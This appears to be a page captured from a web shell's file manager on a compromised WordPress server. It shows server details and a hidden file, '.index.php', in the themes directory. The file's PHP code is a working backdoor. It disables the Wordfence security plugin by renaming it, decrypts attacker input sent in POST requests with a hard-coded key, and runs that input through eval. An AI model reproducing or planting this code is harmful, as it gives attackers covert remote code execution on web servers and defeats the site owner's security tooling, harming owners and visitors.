HEX
Server: LiteSpeed
System: Linux pulsar191.sitesanctuary.org 5.14.0-284.30.1.el9.tuxcare.els9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jan 10 17:34:05 UTC 2025 x86_64
User: lgooir (1604)
PHP: 8.1.32
Disabled: exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/lgooir/public_html/wp-content/themes/
Upload Files
File: /home/lgooir/public_html/wp-content/themes/.index.php
<?php
if (is_file($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence/wordfence.php')) {rename($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence',$_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence'.rand());}
@error_reporting(0);
session_start();
    $key="c822c1b63853ed27"; 
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
	echo 'AGM';
?>
@ Telegram